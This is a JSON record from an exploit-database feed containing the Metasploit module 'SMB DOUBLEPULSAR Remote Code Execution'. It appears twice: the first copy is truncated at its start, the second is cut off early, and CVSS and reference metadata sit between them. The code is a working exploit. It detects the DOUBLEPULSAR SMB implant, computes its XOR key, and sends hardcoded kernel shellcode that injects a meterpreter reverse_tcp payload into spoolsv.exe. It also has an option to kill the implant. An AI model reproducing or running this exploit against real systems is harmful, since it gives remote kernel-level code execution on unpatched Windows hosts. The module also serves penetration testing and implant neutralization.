['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-07] #"}, "lastseen": "2021-09-07T06:15:22", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "f62cb47adf0cd6fc99fb5f3d473b23e7", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T22:13:30", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27803"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96703", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-07T22:13:30", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T22:13:30", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def 